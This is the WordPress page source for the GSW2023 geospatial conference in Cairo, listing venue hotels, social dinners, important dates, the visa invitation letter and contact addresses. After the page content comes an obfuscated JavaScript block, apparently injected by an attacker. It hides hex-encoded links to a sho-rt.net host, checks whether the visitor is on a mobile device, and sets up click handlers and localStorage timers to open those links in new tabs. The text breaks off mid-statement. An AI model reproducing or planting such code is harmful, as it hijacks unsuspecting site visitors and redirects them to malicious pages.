20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 